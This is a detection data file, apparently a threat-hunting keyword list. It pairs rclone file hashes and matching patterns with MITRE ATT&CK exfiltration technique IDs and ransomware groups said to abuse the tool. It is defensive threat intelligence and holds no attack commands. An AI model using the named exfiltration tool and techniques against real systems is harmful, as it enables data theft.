"*c307a8440f2c388425525b39d5ecfcd801c747330ed73d28e04cf65dc71caaa1*",".{0,1000}c307a8440f2c388425525b39d5ecfcd801c747330ed73d28e04cf65dc71caaa1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c3125567cd38e49ff50e7831e180ad0818692ce669ce25fd1796530cd66b55ab*",".{0,1000}c3125567cd38e49ff50e7831e180ad0818692ce669ce25fd1796530cd66b55ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c316b4a76fc36899e654991376dbbd7dc5a94fa721da223e981dce247216dc17*",".{0,1000}c316b4a76fc36899e654991376dbbd7dc5a94fa721da223e981dce247216dc17.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c323b705602fcdab6f09572959ff9f7b0a6ec950129a1046c83c5cfae91ab28d*",".{0,1000}c323b705602fcdab6f09572959ff9f7b0a6ec950129a1046c83c5cfae91ab28d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c365445b0b3203e5535c9c03f0e4b9f1bfc48ba55766cc4277d18aefbde84456*",".{0,1000}c365445b0b3203e5535c9c03f0e4b9f1bfc48ba55766cc4277d18aefbde84456.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c3cd6c2268c4e6f6bc42ea821588d420aed9caedead9d094070ad8f565ecffd6*",".{0,1000}c3cd6c2268c4e6f6bc42ea821588d420aed9caedead9d094070ad8f565ecffd6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c4ab3986686899e9fd446713363b68f65d4710d566b1013b353191607e0c4e1d*",".{0,1000}c4ab3986686899e9fd446713363b68f65d4710d566b1013b353191607e0c4e1d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c4b9ef6591ae20eb0b125566f40b76cb3fc54671d1d474a5f30fb272b0a1c65f*",".{0,1000}c4b9ef6591ae20eb0b125566f40b76cb3fc54671d1d474a5f30fb272b0a1c65f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c4ea1ed3224d14b9af33bb5de9f66bd98a986323fefa8b6f9b94a59227edfe0b*",".{0,1000}c4ea1ed3224d14b9af33bb5de9f66bd98a986323fefa8b6f9b94a59227edfe0b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c4fe61892d40eb2a106bb1b59b0284cab20f7ec71ee6417fca03f15d062a257c*",".{0,1000}c4fe61892d40eb2a106bb1b59b0284cab20f7ec71ee6417fca03f15d062a257c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c50a3ab93082f21788f9244393b19f2426edeeb896eec2e3e05ffb2e8727e075*",".{0,1000}c50a3ab93082f21788f9244393b19f2426edeeb896eec2e3e05ffb2e8727e075.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c526971481cd5f4bc3cc48eaf66f999d61f5615cdd1215516d91e8a79df78967*",".{0,1000}c526971481cd5f4bc3cc48eaf66f999d61f5615cdd1215516d91e8a79df78967.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c52907acfb91a54bd267041d6a967ca6e01031b7b2cf894d066e8776e498ca1b*",".{0,1000}c52907acfb91a54bd267041d6a967ca6e01031b7b2cf894d066e8776e498ca1b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c52cbf3646a2d15765b87cf05fc3b2bca3b1d2782d4922046c597bd979e42720*",".{0,1000}c52cbf3646a2d15765b87cf05fc3b2bca3b1d2782d4922046c597bd979e42720.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c56c22434c289bec00f2ec5e2eff83894575cf51ecdf8e3fe7a906315d666beb*",".{0,1000}c56c22434c289bec00f2ec5e2eff83894575cf51ecdf8e3fe7a906315d666beb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c57a600e0e0000e1d5543d2ff60b6d351fd123c23feff681a5c6eb7b80f20acb*",".{0,1000}c57a600e0e0000e1d5543d2ff60b6d351fd123c23feff681a5c6eb7b80f20acb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c5880fabc845307a19157fa35d4cc31284cee003b1c9852686c6a8412585d4a8*",".{0,1000}c5880fabc845307a19157fa35d4cc31284cee003b1c9852686c6a8412585d4a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c591528e3316538bfaf298764e9003f715de3fc6affdfbdc9edb0275627ee22f*",".{0,1000}c591528e3316538bfaf298764e9003f715de3fc6affdfbdc9edb0275627ee22f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c5bd8f092426a5c99b09cea4a75df91ab8d8a586a734abfde1c0fa7a89a43389*",".{0,1000}c5bd8f092426a5c99b09cea4a75df91ab8d8a586a734abfde1c0fa7a89a43389.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c5e232a129f96e0a03fae4b6ddd4b6129620ca8194fb92fd885c8112b4a84df7*",".{0,1000}c5e232a129f96e0a03fae4b6ddd4b6129620ca8194fb92fd885c8112b4a84df7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c638cfd7896ca9f35706e8b0db118e97925d4f8ecc1748c3a75666ed645775a8*",".{0,1000}c638cfd7896ca9f35706e8b0db118e97925d4f8ecc1748c3a75666ed645775a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c6c96cf14099900a4582003ae7bd2cedd62d69f4fc6820a6adf1503599095509*",".{0,1000}c6c96cf14099900a4582003ae7bd2cedd62d69f4fc6820a6adf1503599095509.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c7048e58d7363cd4ff59c057a6632651bda40c9ad65bf223da6b170a04e6f813*",".{0,1000}c7048e58d7363cd4ff59c057a6632651bda40c9ad65bf223da6b170a04e6f813.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c710d2cf2941d27180e3cfc40066fede75581ead01666e4c0df16c6c2b16e128*",".{0,1000}c710d2cf2941d27180e3cfc40066fede75581ead01666e4c0df16c6c2b16e128.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c8082d0f82601d54507242e44c75d91f33cb02d5b224c579d81c1abcc659a2f9*",".{0,1000}c8082d0f82601d54507242e44c75d91f33cb02d5b224c579d81c1abcc659a2f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c861597da1b6e5f884d6b1a7bfa480596e0ba574babd9d2ed297b26685aac2a8*",".{0,1000}c861597da1b6e5f884d6b1a7bfa480596e0ba574babd9d2ed297b26685aac2a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c86db29845f8c6a4720c47a28c1a53e75ecab95cb14a5ecb6678489d2d8e2a84*",".{0,1000}c86db29845f8c6a4720c47a28c1a53e75ecab95cb14a5ecb6678489d2d8e2a84.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c88798691efdab2ca387d84d5803b4c388f6e7de7471a6222c9fad1914cb2fdf*",".{0,1000}c88798691efdab2ca387d84d5803b4c388f6e7de7471a6222c9fad1914cb2fdf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c9111589f5d92fa49c6fcd8993691158865e0ac95afe95bb1cc122c0a3b79e17*",".{0,1000}c9111589f5d92fa49c6fcd8993691158865e0ac95afe95bb1cc122c0a3b79e17.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c933a304bc8713f7b3916cd107f501070ab568b2f21793431f48a234502f671d*",".{0,1000}c933a304bc8713f7b3916cd107f501070ab568b2f21793431f48a234502f671d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c95ebf48bcef81e9ee296a803ca77244d111e35a55db9680c78b407ed99bb054*",".{0,1000}c95ebf48bcef81e9ee296a803ca77244d111e35a55db9680c78b407ed99bb054.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c96ecc29074845b030484359398988deef3ec8b0a4832de0ca9168e57c040cb8*",".{0,1000}c96ecc29074845b030484359398988deef3ec8b0a4832de0ca9168e57c040cb8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c9aa6d9d1d58919fe795c5209d984d31bcb3f1fccc455a0eaf0fe4a5007e03e6*",".{0,1000}c9aa6d9d1d58919fe795c5209d984d31bcb3f1fccc455a0eaf0fe4a5007e03e6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c9b8dc930557737b54503ce5572adcc11903b34136f5d1300d496db8063b6602*",".{0,1000}c9b8dc930557737b54503ce5572adcc11903b34136f5d1300d496db8063b6602.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c9bc2b37f1d79e9000ad8f53d185a28360f0d4d120e31bee0a57febb29eec08a*",".{0,1000}c9bc2b37f1d79e9000ad8f53d185a28360f0d4d120e31bee0a57febb29eec08a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*c9c6596491f95de71a67e8ca2732616e361b99317303f8d3a36fa946ca4d29f0*",".{0,1000}c9c6596491f95de71a67e8ca2732616e361b99317303f8d3a36fa946ca4d29f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 